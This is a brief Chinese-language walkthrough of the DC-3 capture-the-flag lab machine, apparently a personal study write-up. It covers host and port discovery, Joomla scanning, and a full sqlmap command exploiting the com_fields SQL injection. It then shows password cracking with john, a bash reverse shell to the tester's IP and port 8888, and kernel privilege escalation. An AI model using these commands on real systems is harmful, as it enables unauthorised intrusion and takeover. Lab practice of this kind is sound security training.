DC-3

实验环境实验过程信息收集主机发现端口扫描服务发现目录扫描 漏洞发现漏洞利用提权 总结

实验环境

靶机：DC-3 测试机：kali（IP：192.168.186.128），win10

实验过程

信息收集

主机发现

netdiscover -I eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24

端口扫描

masscan -p 0-65535 --rate=100000 192.168.186.131

服务发现

nmap -sV -p 80 -T4 192.168.186.131

目录扫描

漏洞发现

登录口，网站cms joomla

joomscan -u http://192.168.186.131

得到版本信息

漏洞利用

先searchsploit扫一下找到一个sql注入漏洞

sqlmap -u "http://192.168.186.131/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

joomladb数据库下#_user表下找到用户名密码 john解密得到密码snoopy 找到上传点 反弹shell

bash -c ‘bash -i>& /dev/tcp/192.168.186.128/8888 0>&1’

访问目录

提权

lsb_release -a查看系统内核

searchspolit搜索，根据提示在git上下载对应文件

总结

joomla网站搭建模板，用joomscan扫描对应版本。Searchsploite扫描到版本漏洞，sqlmap跑出账号密码，利用john解密，登录寻找上传点，bash反弹shell，再查看版本内核，寻找提权漏洞，github下载提权exp执行提权。